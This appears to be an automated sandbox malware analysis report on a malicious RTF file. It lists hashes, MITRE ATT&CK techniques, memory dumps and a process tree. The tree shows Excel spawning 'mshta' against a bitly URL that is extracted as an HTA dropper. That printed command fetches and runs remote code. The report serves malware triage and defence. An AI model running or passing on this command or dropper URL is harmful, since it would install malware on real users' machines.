2a8fb09c696dffcdbaaee03b8de29d39ccde55d33973f41d118989d9883966d7

General

Target

2a8fb09c696dffcdbaaee03b8de29d39ccde55d33973f41d118989d9883966d7.rtf
Size

312KB
MD5

4c8790499709bb6ce228ca0c99cfe86a
SHA1

01c0512015b9f0f80173cc3ded25e384517b91b5
SHA256

2a8fb09c696dffcdbaaee03b8de29d39ccde55d33973f41d118989d9883966d7
SHA512

53e38583e37a7c789a69fe1f3d72f9d0c851bb2d5f5c2c772cdeed2e3d1b753775d1809b11face9c7b793376efdf5e9b76d5f75f9cd0f3f2006066503e9a8dd8
SSDEEP

3072:y/8teyGofCdw/8teyGofCd5/8teyGofCda/8teyGofCdv/8teyGofCd8:bzGgczGgBzGg6zGgnzGg7

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.bitly.com/ChutasdhikhasdAS3

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1800	3556	mshta.exe	87

Blocklisted process makes network request 11 IoCs

flow	pid	Process
107	1800	mshta.exe
109	1800	mshta.exe
111	1800	mshta.exe
113	1800	mshta.exe
115	1800	mshta.exe
118	1800	mshta.exe
119	1800	mshta.exe
120	1800	mshta.exe
123	1800	mshta.exe
124	1800	mshta.exe
126	1800	mshta.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1644	WINWORD.EXE
1644	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1644	WINWORD.EXE

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
1644	WINWORD.EXE
1644	WINWORD.EXE
1644	WINWORD.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
3556	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE
5080	EXCEL.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3556 wrote to memory of 1800	3556	EXCEL.EXE	89
PID 3556 wrote to memory of 1800	3556	EXCEL.EXE	89

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2a8fb09c696dffcdbaaee03b8de29d39ccde55d33973f41d118989d9883966d7.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1644

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3556
- C:\Windows\SYSTEM32\mshta.exe
  mshta http://www.bitly.com/ChutasdhikhasdAS3
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  PID:1800

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BFDA9EDC-0999-49C0-A7D2-C14C960E5F37

Filesize
147KB

MD5
494c10927dac1312a337ba57101fa35c

SHA1
bed6b9578fa2cdd2dc46d1cc21bb193f07652c1f

SHA256
1a889426bb2efd8ef32c8887b194087c97d278ee76c928240dfeb2c4e5d24853

SHA512
79034f53372651f36358ee4f966f2f685c1f9eb044e62cf8e8e02a9b521eef4b0d162c0c63df3c41c3ab770a2a60e53aaf3bc5f75eb1fb9dd44e0afde0812693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
324KB

MD5
09054487e8c69240c9416b375b2916a9

SHA1
f00ff01ae8c39170c57f9b27cedea8ef75f455b3

SHA256
2d895d38c2f9874b296b8d5d8eef1e3738230d416f4b10517099027c0fe9b876

SHA512
971c817f16331dbf06bd908ae5440ee5bc55ddab549cee258b792170c1f2144d4cfcbd14cee31e3e2f9606d0e3e48f226564131023fc035ed67d4e1b171b97f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
4KB

MD5
f138a66469c10d5761c6cbb36f2163c3

SHA1
eea136206474280549586923b7a4a3c6d5db1e25

SHA256
c712d6c7a60f170a0c6c5ec768d962c58b1f59a2d417e98c7c528a037c427ab6

SHA512
9d25f943b6137dd2981ee75d57baf3a9e0ee27eea2df19591d580f02ec8520d837b8e419a8b1eb7197614a3c6d8793c56ebc848c38295ada23c31273daa302d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

Filesize
48KB

MD5
4844a2bf581024ffa2e05d54309a20fc

SHA1
87bb08d05061c69a6e9cc67ef8b519d7f89203fb

SHA256
a2e92f5e931f8e57678b5498d512eb7e8d244ec6158bc56c717abb4fff50eee5

SHA512
29a793087b50977714fb6f36accf7d8b11803dec4a76e04e2b7fede6d65c356b5c028d9500de851bc4d32da38bddcafa99bbf8395bc96eb19353b19825748d47

Download Submit
memory/1644-136-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/1644-134-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/1644-138-0x00007FFD141D0000-0x00007FFD141E0000-memory.dmp

Filesize
64KB

Download
memory/1644-133-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/1644-137-0x00007FFD141D0000-0x00007FFD141E0000-memory.dmp

Filesize
64KB

Download
memory/1644-132-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/1644-135-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/3556-147-0x0000020A3D2F3000-0x0000020A3D2F5000-memory.dmp

Filesize
8KB

Download
memory/3556-146-0x0000020A3D2F3000-0x0000020A3D2F5000-memory.dmp

Filesize
8KB

Download
memory/3556-162-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/3556-163-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/3556-164-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/3556-165-0x00007FFD16230000-0x00007FFD16240000-memory.dmp

Filesize
64KB

Download
memory/5080-166-0x0000026C6BFE9000-0x0000026C6BFEB000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads